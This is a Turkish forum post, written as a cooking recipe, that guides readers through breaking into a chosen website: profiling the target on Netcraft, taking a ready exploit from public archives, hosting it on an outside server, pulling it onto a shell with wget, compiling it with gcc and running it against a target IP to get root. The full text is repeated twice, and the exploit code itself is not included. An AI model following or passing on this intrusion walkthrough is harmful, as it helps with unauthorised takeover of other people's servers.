Partizan
New member
Remote Exploit / C. Perl. Derleme
Malzemeler :
Bir adet Exploit, Bir host (alan), ve Putty (program)
Hazırlanışı
hedef olarak bir site belirlendikten sonra, yapılacak ilk iş bu sitenin bilgilerini öğrenmek bunun içinde www.netcraft.com adresine girerek; Kurulu olan sistemi, IP adresleri vs bilgileri öğrenebilirsiniz..
Sistem bilgilerini bir kenara kaydettikten sonra, gerekli olan exploit`imizi hazırlamaya geldi.. bunun için www.securityfocus.com veya www.packetstromsecurity.com sitelerindeki exploitleri kullanabiliriz.. Burdan almış olduğumuz exploitin adı partizan.c olsun...
önceden hazırda bulunan host`a bunu atıyoruz...
örn: http://lastoath.hackhell.com/partizan.c
şeklinde bi adresimiz oldu..
ve Artık shellimize bağlanmama vakti geldi, bunun için putty denilen ufak bi programı kullanıcaz,, google`da arama yaptığınız taktirde bulabilirsiniz..
Programı açıp, bir kenera kaydedilen IP adresini buraya giriyoruz, Open (Connect) tuşuna basarak bağlantı kuruyoruz..
kurulduktan sonra sıra exploitimizi shell`imize taşıma vakti geldi..
Kod:
--------------------------------------------------------------------------------
wget http://lastoath.hackhell.com/partizan.c
yazıp exploit`i shell`e taşıdık.. böylece derlenmeye hazır bir exploit elde ettik..
Kod:
--------------------------------------------------------------------------------
gcc -o lastoath partizan.c
komutunu kullanarak exploitin ismini lastoath olarak değiştiriyoruz..
Kod:
--------------------------------------------------------------------------------
./lastoath
yazarak exploit`i aktif hale getiriyoruz..
Kod:
--------------------------------------------------------------------------------
./lastoath -1 201.97.123.456
bu şekilde exploit`i çalıştırarak, sitede exploit`in özelliklerine göre root yetkisi kazanmış oluruz.. bundan sonrası exploit`in özelliklerine kalıyor..
Bunları kullanabilmeniz için biraz bilgi ve unix bilginiz olması gerekli,, eğer Linux kullanıyorsanız zaten temeli unix`dir ve komutları aynıdır.. bilgisayarınızda linux kuruluysa hiç shell`e gerek duymadan exploit`i kullanabilirsiniz..
Malzemeler :
Bir adet Exploit, Bir host (alan), ve Putty (program)
Hazırlanışı
hedef olarak bir site belirlendikten sonra, yapılacak ilk iş bu sitenin bilgilerini öğrenmek bunun içinde www.netcraft.com adresine girerek; Kurulu olan sistemi, IP adresleri vs bilgileri öğrenebilirsiniz..
Sistem bilgilerini bir kenara kaydettikten sonra, gerekli olan exploit`imizi hazırlamaya geldi.. bunun için www.securityfocus.com veya www.packetstromsecurity.com sitelerindeki exploitleri kullanabiliriz.. Burdan almış olduğumuz exploitin adı partizan.c olsun...
önceden hazırda bulunan host`a bunu atıyoruz...
örn: http://lastoath.hackhell.com/partizan.c
şeklinde bi adresimiz oldu..
ve Artık shellimize bağlanmama vakti geldi, bunun için putty denilen ufak bi programı kullanıcaz,, google`da arama yaptığınız taktirde bulabilirsiniz..
Programı açıp, bir kenera kaydedilen IP adresini buraya giriyoruz, Open (Connect) tuşuna basarak bağlantı kuruyoruz..
kurulduktan sonra sıra exploitimizi shell`imize taşıma vakti geldi..
Kod:
--------------------------------------------------------------------------------
wget http://lastoath.hackhell.com/partizan.c
yazıp exploit`i shell`e taşıdık.. böylece derlenmeye hazır bir exploit elde ettik..
Kod:
--------------------------------------------------------------------------------
gcc -o lastoath partizan.c
komutunu kullanarak exploitin ismini lastoath olarak değiştiriyoruz..
Kod:
--------------------------------------------------------------------------------
./lastoath
yazarak exploit`i aktif hale getiriyoruz..
Kod:
--------------------------------------------------------------------------------
./lastoath -1 201.97.123.456
bu şekilde exploit`i çalıştırarak, sitede exploit`in özelliklerine göre root yetkisi kazanmış oluruz.. bundan sonrası exploit`in özelliklerine kalıyor..
Bunları kullanabilmeniz için biraz bilgi ve unix bilginiz olması gerekli,, eğer Linux kullanıyorsanız zaten temeli unix`dir ve komutları aynıdır.. bilgisayarınızda linux kuruluysa hiç shell`e gerek duymadan exploit`i kullanabilirsiniz..